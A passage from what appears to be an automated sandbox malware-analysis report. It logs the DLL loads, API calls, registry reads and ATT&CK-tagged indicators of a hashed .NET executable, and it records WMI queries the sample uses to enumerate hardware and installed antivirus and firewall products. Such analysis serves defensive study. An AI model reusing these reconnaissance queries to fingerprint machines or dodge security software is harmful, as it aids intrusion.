\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"MSCOREE.DLL\" at base 6b870000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"PSAPI.DLL\" at base 75f20000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"RPCRT4.DLL\" at base 75d60000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"KERNEL32.DLL\" at base 75fd0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 632a0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"OLE32.DLL\" at base 75600000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"CRYPTBASE.DLL\" at base 751c0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74150000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 72070000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6a2b0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 62840000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6a100000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 619d0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 720d0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 611b0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 699b0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 60a30000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"NTDLL.DLL\" at base 773c0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"SHELL32.DLL\" at base 76230000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75d40000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"PROFAPI.DLL\" at base 752d0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"BCRYPT.DLL\" at base 74de0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"CRYPTSP.DLL\" at base 74cd0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a60000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"UXTHEME.DLL\" at base 74150000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"COMCTL32.DLL\" at base 741c0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"DWMAPI.DLL\" at base 73a00000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 63F00000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 646B0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\" was detected as \".NET\" and name: \"Library\"\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"Antivirus\" (Indicator: \"antivirus\") in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-605", "type": 2, "relevance": 1, "name": "May execute SQL queries", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, Indicator: \"select caption from win32_operatingsystem\")\n \"SELECT * FROM Win32_BIOS\" (Source: 6000239-_~_, Indicator: \"select * from win32_bios\")\n \"SELECT * FROM Win32_BaseBoard\" (Source: 600023a-_~_, Indicator: \"select * from win32_baseboard\")\n \"SELECT * FROM Win32_Processor\" (Source: 600023b-_~_, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 600023c-_~_, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_DisplayConfiguration\" (Source: 600023d-_~_, Indicator: \"select * from win32_displayconfiguration\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Source: 6000269-_~_, Indicator: \"select * from win32_operatingsystem where primary='true'\")\n \"SELECT * FROM AntivirusProduct\" (Source: 600026b-_~_, Indicator: \"select * from antivirusproduct\")\n \"SELECT * FROM FirewallProduct\" (Source: 600026c-_~_, Indicator: \"select * from firewallproduct\")", "origin": "File/Memory", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005912)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005912)\n 